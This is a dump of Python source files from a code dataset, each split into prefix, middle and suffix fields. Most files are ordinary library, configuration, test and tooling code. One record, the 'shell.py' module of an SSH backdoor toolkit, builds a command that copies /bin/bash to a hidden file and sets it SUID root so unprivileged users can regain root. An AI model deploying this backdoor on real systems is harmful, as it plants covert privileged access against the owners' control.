repo_name stringlengths 5 100 | path stringlengths 4 231 | language stringclasses 1 value | license stringclasses 15 values | size int64 6 947k | score float64 0 0.34 | prefix stringlengths 0 8.16k | middle stringlengths 3 512 | suffix stringlengths 0 8.17k |
|---|---|---|---|---|---|---|---|---|
Lynx3d/pylotro | PyLotROLauncher/Information.py | Python | gpl-3.0 | 441 | 0.004535 | # coding=utf-8
Version = "0.2.0"
Description = "LOTRO/DDO Launcher"
Author | = "Alan Jackson"
Email = "ajackson@bcs.org.uk"
WebSite = "http://www.lotrolinux.com"
LongDescription = "Lord of the Rings Online and Dungeons & Dragons Online\nLauncher for Linux & Mac OS X"
Copyright=" (C) 2009-2010 AJackson"
CLIRef | erence = "Based on CLI launcher for LOTRO\n(C) 2007-2010 SNy"
LotROLinuxReference = "Based on LotROLinux\n(C) 2007-2009 AJackson"
|
kaixinjxq/web-testing-service | wts/tests/csp/csp_media-src_corss-origin_audio_allowed_ext.py | Python | bsd-3-clause | 3,027 | 0.001321 | def main(request, response):
import simplejson as json
f = file('config.json')
source = f.read()
s = json.JSONDecoder().decode(source)
url1 = "http://" + s['host'] + ":" + str(s['ports']['http'][1])
url2 = "http://" + s['host'] + ":" + str(s['ports']['http'][0])
_CSP = "media-src " + url1 + "; script-src 'self' 'unsafe-inline'"
response.headers.set("Content-Security-Policy", _CSP)
response.headers.set("X-Content-Security-Policy", _CSP)
response.headers.set("X-WebKit-CSP", _CSP)
return """<!DOCTYPE html>
<!--
Copyright (c) 2013 Intel Corporation.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
* Redistributions of works must retain the original copyright notice, this list
of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the original copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of Intel Corporation nor the names of its contributors
may be used to endorse or promote products derived from this work without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY INTEL CORPORATION "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL INTEL CORPORATION BE LIABLE FOR ANY DIRECT,
INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
Authors:
Zhang, Zhiqiang <zhiqiang.zhang@i | ntel.com>
-->
<html>
<head>
<title>CSP Test: csp_media-src_cross-origin_audio_allowed_e | xt</title>
<link rel="author" title="Intel" href="http://www.intel.com"/>
<link rel="help" href="http://www.w3.org/TR/2012/CR-CSP-20121115/#media-src"/>
<meta name="flags" content=""/>
<meta charset="utf-8"/>
<script src="../resources/testharness.js"></script>
<script src="../resources/testharnessreport.js"></script>
</head>
<body>
<div id="log"></div>
<audio id="m"></audio>
<script>
var t = async_test(document.title);
var m = document.getElementById("m");
m.src = '""" + url1 + """/tests/csp/support/khronos/red-green.theora.ogv';
window.setTimeout(function() {
t.step(function() {
assert_false(m.currentSrc == "",
"audio.currentSrc should not be empty after setting src attribute");
});
t.done();
}, 0);
</script>
</body>
</html> """
|
D-K-E/cltk | src/cltk/ner/processes.py | Python | mit | 4,577 | 0.001374 | """This module holds the ``Process``es for NER."""
from copy import deepcopy
from dataclasses import dataclass
from typing import Any, List
from boltons.cacheutils import cachedproperty
from cltk.core.data_types import Doc, Process
from cltk.ner.ner import tag_ner
@dataclass
class NERProcess(Process):
"""To be inherited for each language's NER declarations.
>>> from cltk.core.data_types import Doc
>>> from cltk.ner.processes import NERProcess
>>> from cltk.core.data_types import Process
>>> issubclass(NERProcess, Process)
True
>>> emb_proc = NERProcess()
"""
language: str = None
@cachedproperty
def algorithm(self):
return tag_ner
def run(self, input_doc: Doc) -> Doc:
output_doc = deepcopy(input_doc)
ner_obj = self.algorithm
entity_values = ner_obj(
iso_code=self.language, input_tokens=input_doc.tokens
) # type: List[Any]
for index, word_obj in enumerate(output_doc.words):
word_obj.named_entity = entity_values[index]
output_doc.words[index] = word_obj
return output_doc
@dataclass
class GreekNERProcess(NERProcess):
"""The default Greek NER algorithm.
.. todo::
Update doctest w/ production model
>>> from cltk.core.data_types import Doc, Word
>>> from cltk.languages.example_texts import get_example_text
>>> from boltons.strutils import split_punct_ws
>>> text = "ἐπὶ δ᾽ οὖν τοῖς πρώτοις τοῖσδε Περικλῆς ὁ Ξανθίππου ᾑρέθη λέγειν. καὶ ἐπειδὴ καιρὸς ἐλάμβανε, προελθὼν ἀπὸ τοῦ σήματος ἐπὶ βῆμα ὑψηλὸν πεποιημένον, ὅπως ἀκούοιτο ὡς ἐπὶ πλεῖστον τοῦ ὁμίλου, ἔλεγε τοιάδε."
>>> tokens = [Word(string=token) for token in split_punct_ws(text)]
>>> a_process = GreekNERProcess()
>>> output_doc = a_process.run(Doc(raw=text, words=tokens))
>>> output_doc.words[7].string
'ὁ'
>>> output_doc.words[7].named_entity
False
>>> output_doc.words[8].string
'Ξανθίππου'
>>> output_doc.words[8].named_entity
False
"""
language: str = "grc"
description: str = "Default NER for Greek."
@dataclass
class OldEnglishNERProcess(NERProcess):
"""The default OE NER algorithm.
.. todo::
Update doctest w/ production model
>>> from cltk.core.data_types import Doc, Word
>>> from cltk.languages.example_texts import get_example_text
>>> from boltons.strutils import split_punct_ws
>>> text = get_example_text(iso_code="ang")
>>> tokens = [Word(string=token) for token in split_punct_ws(text)]
>>> a_process = OldEnglishNERProcess()
>>> output_doc = a_process.run(Doc(raw=text, words=tokens))
>>> output_doc.words[2].string, output_doc.words[2].named_entity
('Gardena', 'LOCATION')
"""
language: str = "ang"
description: str = "Default NER for Old English."
@dataclass
class LatinNERProcess(NERProcess):
"""The default Latin NER algorithm.
>>> from cltk.core.data_types import Doc, Word
>>> from cltk.languages.example_texts import get_example_text
>>> from boltons.strutils import split_punct_ws
>>> tokens = [Word(string=token) for token in split_punct_ws(get_example_text("lat"))]
>>> a_process = LatinNERProcess()
>>> output_doc = a_process.run(Doc(raw=get_example_text("lat"), words=tokens))
>>> [word.named_entity for word in output_doc.words][:20]
['LOCATION', False, False, False, False, False, False, False, False, False, 'LOCATION', False, 'LOCATION', False, False, False, False, 'LOCATION', False, 'LOCATION']
"""
language: str = "lat"
description: str = "Default NER for Latin."
@dataclass
class OldFrenchNERProcess(NERProcess):
"""The default Old French NER algorithm.
>>> from cltk.core.data_types import Doc, Word
>>> from cltk.languages.example_texts import get_example_text
>>> from boltons.strutils import split_punct_ws
>>> tok | ens = [Word(string=token) for token in split_punct_ws(get_example_text("fro"))]
>>> a_process = OldFrenchNERProcess()
>>> output_doc = a_process.run(Doc(raw=get_example_text("fro"), words=tokens))
>>> output_doc.words[30].string
'Bretaigne'
>>> output_doc.words[30].named_entity
'LOC'
>>> output_doc.words[31].named_entity
False
"""
language: str = "fro"
description: str = "Default NER for O | ld French."
|
websauna/pyramid_sms | docs/conf.py | Python | isc | 8,451 | 0.005325 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# pyramid_sms documentation build configuration file, created by
# sphinx-quickstart on Tue Jul 9 22:26:36 2013.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another
# directory, add these directories to sys.path here. If the directory is
# relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# Get the project root dir, which is the parent dir of this
cwd = os.getcwd()
project_root = os.path.dirname(cwd)
# Insert the project root dir as the first element in the PYTHONPATH.
# This lets us ensure that the source package is imported, and that its
# version is used.
sys.path.insert(0, project_root)
import pyramid_sms
# -- General configuration ---------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'SMS for Pyramid'
copyright = u'2016, Mikko Ohtamaa'
# The version info for the project you're documenting, acts as replacement
# for |version| and |release|, also used in various other places throughout
# the built documents.
#
# The short X.Y version.
version = "0.1"
# The full version, including alpha/beta/rc tags.
release = "0.1"
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to
# some non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built
# documents.
#keep_warnings = False
# -- Options for HTML output -------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a
# theme further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as
# html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the
# top of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon
# of the docs. This file should be a Windows icon file (.ico) being
# 16x16 or 32x32 pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets)
# here, relative to this directory. They are copied after the builtin
# static files, so a file named "default.css" will overwrite the builtin
# "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page
# bottom, using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names
# to template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer.
# Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer.
# Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages
# will contain a <link> tag referring to it. The value of this option
# must be the base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'pyramid_smsdoc'
# -- Options for LaTeX output ------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
('index', 'pyramid_sms.tex',
u'SMS for Pyramid Documentation',
u'Mikko Ohtamaa', 'manual'),
]
# The name of an image file (relative to this directory) to place at
# the top of the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings
# are parts, not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'pyramid_sms',
u'SMS for Pyramid Documentation',
[u'Mikko Ohtamaa'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ----------------------------------------
# Grouping the document tree into Texinfo files. | List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'pyramid_sms',
u'SMS for Pyramid Documentation',
u'Mikko Ohtamaa',
'pyramid_sms',
'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appen | dix to all manuals.
#texinfo_appendices = []
# If false, no module ind |
asciimoo/searx | searx/engines/json_engine.py | Python | agpl-3.0 | 3,207 | 0.000624 | from collections import Iterable
from json import loads
from sys import version_info
from searx.url_utils import urlencode
from searx.utils import to_string
if version_info[0] == 3:
unicode = str
search_url = None
url_query = None
content_query = None
title_query = None
paging = False
suggestion_query = ''
results_query = ''
# parameters for engines with paging support
#
# number of results on each page
# (only needed if the site requires not a page number, but an offset)
page_size = 1
# number of the first page (usually 0 or 1)
first_page_num = 1
def iterate(iterable):
if type(iterable) == dict:
it = iterable.items()
else:
it = enumerate(iterable)
for index, value in it:
yield str(index), value
def is_iterable(obj):
if type(obj) == str:
return False
if type(obj) == unicode:
return False
return isinstance(obj, Iterable)
def parse(query):
q = []
for part in query.split('/'):
if part == '':
continue
else:
q.append(part)
return q
def do_query(data, q):
ret = []
if not q:
return ret
qkey = q[0]
for key, value in iterate(data):
if len(q) == 1:
if key == qkey:
ret.append(value)
elif is_iterable(value):
ret.extend(do_query(value, q))
else:
if not is_iterable(value):
continue
if key == qkey:
ret.extend(do_query(value, q[1:]))
else:
ret.extend(do_query(value, q))
return ret
def query(data, query_string):
q = parse(query_string)
return do_query(data, q)
def request(query, params):
query = urlencode({'q': query})[2:]
fp = {'query': query}
if paging and search_url.find('{pageno}') >= 0:
fp['pageno'] = (params['pageno'] - 1) * page_size + first_page_num
params['url'] = search_url.format(**fp)
params['query'] = query
return params
|
def response(resp):
resul | ts = []
json = loads(resp.text)
if results_query:
rs = query(json, results_query)
if not len(rs):
return results
for result in rs[0]:
try:
url = query(result, url_query)[0]
title = query(result, title_query)[0]
except:
continue
try:
content = query(result, content_query)[0]
except:
content = ""
results.append({
'url': to_string(url),
'title': to_string(title),
'content': to_string(content),
})
else:
for url, title, content in zip(
query(json, url_query),
query(json, title_query),
query(json, content_query)
):
results.append({
'url': to_string(url),
'title': to_string(title),
'content': to_string(content),
})
if not suggestion_query:
return results
for suggestion in query(json, suggestion_query):
results.append({'suggestion': suggestion})
return results
|
Sonophoto/PythonNotes | primalPython/primalPython.py | Python | bsd-2-clause | 2,338 | 0.010265 | # Primal Python:
#
# Functions for calculating primeness of numbers.
# Implementation (c) 2016-2020 Brig Young (github.com/Sonophoto)
# License: BSD-2c, i.e. Cite. [LINK TO REPO]
#
# Original Problem Statement
# accept number input
# list all primes upto and including this number.
# return a python list in ascending order
#
# First code is to sum the digits of the number
# Next we code for divisibility by 3, 5, 7,
from math import sqrt
from functools import wraps
def digitalRoot(number):
""" Takes a single value "number" as type(int) or type(str) and
calculates the dig | ital root. Recurses as needed to reduce
digital_root to a single digit.
See: https://oeis.org/A010888 for more on digital roots.
"""
number = _validate(number)
digital_root = 0
for c in number: digital_root += int(c)
i | f digital_root < 10:
return digital_root
elif digital_root >= 10: # We have more than one digit, recurse
return digitalRoot(digital_root)
def digitalSum(number):
""" Takes a single value "number" as type(int) of type(str) and sums
the digits to a multi-digit digital sum.
"""
number = _validate(number)
digital_sum = 0
for c in number: digital_sum += int(c)
return digital_sum
def pyPrimeFinder(number):
"""This is taken directly from python docs, thrown in for fun, this is a classic brute force method
https://docs.python.org/3/tutorial/controlflow.html#break-and-continue-statements-and-else-clauses-on-loops
"""
for n in range(2, number):
for x in range(2, n):
if n % x == 0:
print(n, 'equals', x, '*', n//x)
break
else:
# loop fell through without finding a factor
print(n, 'is a prime number')
def _validate(number):
""" Verify that returned value is valid string representation of an
integer value or error.
"""
# Validate Input
if type(number) == str: # If it is a string, make sure it is digits
if isdigit(number): number
else:
print("Verify that your imput consists of the digits 0 thru 9. Your input: ", number)
return -1 #Bad Input
elif type(number) == int: # It is an integer value, convert to string
number = str(number)
return number
|
andnovar/kivy | kivy/tools/report.py | Python | mit | 5,809 | 0.002238 | '''
Report tool
===========
This tool is a helper for users. It can be used to dump information
for help during the debugging process.
'''
import os
import sys
from time import ctime
from configparser import ConfigParser
from io import StringIO
import kivy
report = []
report_dict = {} # One key value pair for each title.
def title(t):
report.append('')
report.append('=' * 80)
report.append(t)
report.append('=' * 80)
report.append('')
# This method sends report to gist(Different file in a single gist) and
# returns the URL
def send_report(dict_report):
import requests
import json
gist_report = {
"description": "Report",
"public": "true",
"files": {
"Global.txt": {
"content": "\n".join(dict_report['Global']),
"type": 'text'
},
"OpenGL.txt": {
"content": "\n".join(dict_report['OpenGL']),
"type": 'text'
},
"Core selection.txt": {
"content": "\n".join(dict_report['Core']),
"type": 'text'
},
"Libraries.txt": {
"content": "\n".join(dict_report['Libraries']),
"type": 'text'
},
"Configuration.txt": {
"content": "\n".join(dict_report['Configuration']),
"type": 'text'
},
"Input Availablity.txt": {
"content": "\n".join(dict_report['InputAvailablity']),
"type": 'text'
},
"Environ.txt": {
"content": "\n".join(dict_report['Environ']),
"type": 'text'
},
"Options.txt": {
"content": "\n".join(dict_report['Options']),
"type": 'text'
},
}
}
report_json = json.dumps(gist_report)
response = requests.post("https://api.github.com/gists", report_json)
return json.loads(response.text)['html_url']
# ----------------------------------------------------------
# Start output debugging
# ----------------------------------------------------------
title('Global')
report.append('OS platform : %s' % sys.platform)
report.append('Python EXE : %s' % sys.executable)
report.append('Python Version : %s' % sys.version)
report.append('Python API : %s' % sys.api_version)
report.append('Kivy Version : %s' % kivy.__version__)
report.append('Install path : %s' % os.path.dirname(kivy.__file__))
report.append('Install date : %s' % ctime(os.path.getctime(kivy.__file__)))
report_dict['Global'] = report
report = []
title('OpenGL')
from kivy.core import gl
from kivy.core.window import Window
report.append('GL Vendor: %s' % gl.glGetString(gl. | GL_VENDOR))
report.append('GL Renderer: %s' % gl.glGetString(gl.GL_RENDERER))
report.append('GL Version: %s' % gl.glGetString(gl.GL_VERSION))
ext = gl.glGetString(gl.GL_EXTENSIONS)
if ext is None:
report.append('GL Extensions: %s' % ext)
else:
report.append('GL Extensions:')
for x in ext.split():
report.append('\t%s' % x)
Window.close()
report_dict['OpenGL'] = report
report = []
title('Core selection')
from kivy.core.audio import SoundLoader
report.a | ppend('Audio = %s' % SoundLoader._classes)
from kivy.core.camera import Camera
report.append('Camera = %s' % Camera)
from kivy.core.image import ImageLoader
report.append('Image = %s' % ImageLoader.loaders)
from kivy.core.text import Label
report.append('Text = %s' % Label)
from kivy.core.video import Video
report.append('Video = %s' % Video)
report.append('Window = %s' % Window)
report_dict['Core'] = report
report = []
title('Libraries')
def testimport(libname):
try:
l = __import__(libname)
report.append('%-20s exist at %s' % (libname, l.__file__))
except ImportError:
report.append('%-20s is missing' % libname)
for x in (
'gst',
'pygame',
'pygame.midi',
'pyglet',
'videocapture',
'squirtle',
'PIL',
'opencv',
'opencv.cv',
'opencv.highgui',
'cython'):
testimport(x)
report_dict['Libraries'] = report
report = []
title('Configuration')
s = StringIO()
from kivy.config import Config
ConfigParser.write(Config, s)
report.extend(s.getvalue().split('\n'))
report_dict['Configuration'] = report
report = []
title('Input availability')
from kivy.input.factory import MotionEventFactory
for x in MotionEventFactory.list():
report.append(x)
report_dict['InputAvailablity'] = report
report = []
'''
title('Log')
for x in pymt_logger_history.history:
report.append(x.message)
'''
title('Environ')
for k, v in os.environ.items():
report.append('%s = %s' % (k, v))
report_dict['Environ'] = report
report = []
title('Options')
for k, v in kivy.kivy_options.items():
report.append('%s = %s' % (k, v))
report_dict['Options'] = report
report = []
# Prints the entire Output
print('\n'.join(report_dict['Global'] + report_dict['OpenGL'] +
report_dict['Core'] + report_dict['Libraries'] +
report_dict['Configuration'] +
report_dict['InputAvailablity'] +
report_dict['Environ'] + report_dict['Options']))
print()
print()
try:
reply = input(
'Do you accept to send report to https://gist.github.com/ (Y/n) : ')
except EOFError:
sys.exit(0)
if reply.lower().strip() in ('', 'y'):
print('Please wait while sending the report...')
paste_url = send_report(report_dict)
print()
print()
print('REPORT posted at %s' % paste_url)
print()
print()
else:
print('No report posted.')
# On windows system, the console leave directly after the end
# of the dump. That's not cool if we want get report url
input('Enter any key to leave.')
|
lgarren/spack | var/spack/repos/builtin/packages/r-gridextra/package.py | Python | lgpl-2.1 | 1,773 | 0.000564 | ##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Pl | ace, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class RGridextra(RPackage):
"""Provides a number of user-level functions to work with "grid" graphics,
notably to | arrange multiple grid-based plots on a page, and draw tables."""
homepage = "https://cran.r-project.org/package=gridExtra"
url = "https://cran.r-project.org/src/contrib/gridExtra_2.2.1.tar.gz"
list_url = homepage
version('2.3', '01e0ea88610756a0fd3b260e83c9bd43')
version('2.2.1', '7076c2122d387c7ef3add69a1c4fc1b2')
depends_on('r-gtable', type=('build', 'run'))
|
angelbarrera92/simple-python-load-balancer | loadbalancer/validator.py | Python | mit | 1,735 | 0.004035 | from jsonschema import validate
import jsonschema, sys
user_schema = {
"type": "object",
"properties": {
"email": {"type": "string", "pattern": "(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)"},
"password": | {"type": "string", "minLength": 6, "maxLength": 30},
},
"required": ["email", "password"]
}
app_new_machine_schema = {
"type": "object",
"properties": {
"host": {"type": "string"},
"port": {"type": "number", "minimum": 0, "maximum": 65535},
"statuspath" : {"type": "string"}
},
"required": ["host", "port", "statuspath"]
}
app_machine_schema = {
"type": "object",
"prop | erties": {
"host": {"type": "string"},
"port": {"type": "number", "minimum": 0, "maximum": 65535}
},
"required": ["host", "port"]
}
def is_user_json_valid(user_json):
try:
validate(user_json,user_schema)
return True
except jsonschema.exceptions.ValidationError as ve:
#sys.stderr.write("Record #{}: ERROR\n".format(user_json))
sys.stderr.write(str(ve) + "\n")
return False
def is_new_machine_json_valid(machine_json):
try:
validate(machine_json, app_new_machine_schema)
return True
except jsonschema.exceptions.ValidationError as ve:
# sys.stderr.write("Record #{}: ERROR\n".format(user_json))
sys.stderr.write(str(ve) + "\n")
return False
def is_machine_json_valid(machine_json):
try:
validate(machine_json, app_machine_schema)
return True
except jsonschema.exceptions.ValidationError as ve:
# sys.stderr.write("Record #{}: ERROR\n".format(user_json))
sys.stderr.write(str(ve) + "\n")
return False |
sgraham/nope | tools/perf/benchmarks/start_with_url.py | Python | bsd-3-clause | 1,178 | 0.014431 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from measurements import startup
import page_sets
from tele | metry import benchmark
class _StartWithUrl(benchmark.Benchmark):
page_set = page_sets.StartupPagesPageSet
test = startup.StartWithUrl
@classmethod
def Name(cls):
return 'start_with_url.startup_pages'
def CreatePageTest(self, options):
is_cold = (self.tag == 'cold')
retu | rn self.test(cold=is_cold)
@benchmark.Enabled('has tabs')
@benchmark.Disabled('chromeos', 'linux', 'mac', 'win')
class StartWithUrlCold(_StartWithUrl):
"""Measure time to start Chrome cold with startup URLs"""
tag = 'cold'
options = {'pageset_repeat': 5}
@classmethod
def Name(cls):
return 'start_with_url.cold.startup_pages'
@benchmark.Enabled('has tabs')
@benchmark.Disabled('chromeos', 'linux', 'mac', 'win')
class StartWithUrlWarm(_StartWithUrl):
"""Measure time to start Chrome warm with startup URLs"""
tag = 'warm'
options = {'pageset_repeat': 10}
@classmethod
def Name(cls):
return 'start_with_url.warm.startup_pages'
|
krintoxi/NoobSec-Toolkit | NoobSecToolkit /scripts/sshbackdoors/backdoors/escalation/shell.py | Python | gpl-2.0 | 1,559 | 0.007056 | from backdoor import *
class Shell(Backdoor):
prompt = Fore.RED + "(shell) " + Fore.BLUE + ">> " + Fore.RESET
def __init__(self, core):
cmd.Cmd.__init__(self)
self.intro = GOOD + "Using Shell backdoor..."
self.core = core
self.options = {
"name" : Option("name", "/bin/.bash", "name of the duplicated shell", True),
}
self.modules = {}
self.allow_modules = True
self.help_text = GOOD + "The shell backdoor is a priviledge escalation backdoor, similar to (but more powerful than) it's SetUID escalation brother. It duplicates the bash shell to a hidden binary, and sets the SUID bit. Unlike the SetUID backdoor though, this shell gives an unpriviledged user root priviledge with a full shell. Note that you need root access to initially deploy. To use, while SSHed in as an unprivile | dged user, simply run \".bash -p\", and you will have root access."
def get_command(self):
return "echo " + self.core.curtarget.pword + " | sudo -S cp /bin/bash " + self.get_value("name") + " && echo " + self.core.curtarget.pword + " | sudo -S chmod 4755 " + self.get_value("name")
def do_exploit(self, args):
target = self.core.curtarget
print(GOOD + "Initializing backdoor...")
target.ssh.exec_command(self.get_c | ommand())
print(GOOD + "Shell Backdoor attempted.")
for mod in self.modules.keys():
print(INFO + "Attempting to execute " + mod.name + " module...")
mod.exploit()
|
bmarshallk/NAASC | packaging_scripts/PackageManualDataset.py | Python | gpl-3.0 | 14,173 | 0.02025 | #This code packages manually calibrated and imaged datasets
# --------------------------------------------------------------------------------------------------
def ReadDataFromWeb(mousid):
# --------------------------------------------------------------------------------------------------
"""
This function reads the metadata about the project for the given MOUS
"""
import urllib2
dataurl="http://www.eso.org/~fstoehr/project_ous_eb_hierarchy.txt"
dataurl2="http://www.eso.org/~fstoehr/ous_eb_qa0status.txt"
#print "Gathering metadata..."
response = urllib2.urlopen(dataurl)
html = response.read().splitlines()
response = None
mousid = str(mousid)
datadict = {}
datadict = {'mous':mousid}
mousid2=mousid.replace("___","://").replace("_","/")
for line in html:
line=line.split()
#print line[0],line[1],line[2],line[3],line[4]
if line[4]==mousid:
#print "found MOUS"
#print line[0]
datadict['code']=line[0]
datadict['sgous']=line[2]
datadict['gous']=line[3]
datadict['mous']= line[4]
if datadict.has_key('sbuids'):
datadict['sbuids'].append(line[9])
else:
datadict['sbuids']=[line[9]]
if datadict.has_key('sbnames'):
datadict['sbnames'].append(line[10])
else:
datadict['sbnames']=[line[10]]
response2 = urllib2.urlopen(dataurl2)
html2 = response2.read().splitlines()
response2 = None
for line2 in html2:
line2=line2.split("|")
if line2[2]=='SemiPass':
continue
if line2[0]==mousid2:
if datadict.has_key('ebuids'):
datadict['ebuids'].append(line2[1])
else:
datadict['ebuids']=[line2[1]]
return datadict
# -------------------------------------------------------------------- | ------------------------------
def Packaging(datadict, username, qa2_dir):
# --------------------------------------------------------------------------------------------------
'''
#Running the QA2 Packaging (creates the tarballs and directory to be checked by DRMs)
'''
import os
import glob
import subprocess
#moving to user's qa2 directory and checking if Packages directory is there -- if not, create it
os.chdir(qa2_dir)
i | f os.path.isdir('%s/Packages' % qa2_dir) == False:
os.mkdir('Packages')
os.chdir('Packages')
package_dir = os.getcwd()
#Copying in the scriptForPI.py
os.system('cp -f /users/thunter/AIV/science/qa2/scriptForPI.py %s/%s_%s' % (qa2_dir, datadict['code'], datadict['mous']))
#Getting the cycle number for the style to be used in the packager
if datadict['code'].startswith('2013'):
style = 'cycle2-nopipe'
#there are no projects that start with 2014, this was still Cycle 2 and all C2 projects start with 2013 (there was no call in 2014)
if datadict['code'].startswith('2015'):
style = 'cycle3-nopipe'
if datadict['code'].startswith('2016'):
style = 'cycle4-nopipe'
#writing instructions to run in CASA (these are CASA functions)
packaging_instructions = open('PackagingInstructions','a')
packaging_instructions.write('from QA2_Packaging_module import *\n')
packaging_instructions.write('QA_Packager(origpath=\'%s/%s_%s\', readme=\'%s/%s_%s/README.header.txt\', packpath=\'%s/Packages/%s\', gzip_caltables=True, style=\'%s\', mode=\'hard\', PIscript=\'%s/%s_%s/scriptForPI.py\')' % (qa2_dir, datadict['code'], datadict['mous'], qa2_dir, datadict['code'], datadict['mous'], qa2_dir, datadict['code'], style, qa2_dir, datadict['code'], datadict['mous']))
packaging_instructions.close()
subprocess.call(['casa -c PackagingInstructions'], shell=True)
#Running tarsplit (which requires directory name is a certain way), the arguments go 1.) name of output tar file 2.) name of the directory to tar
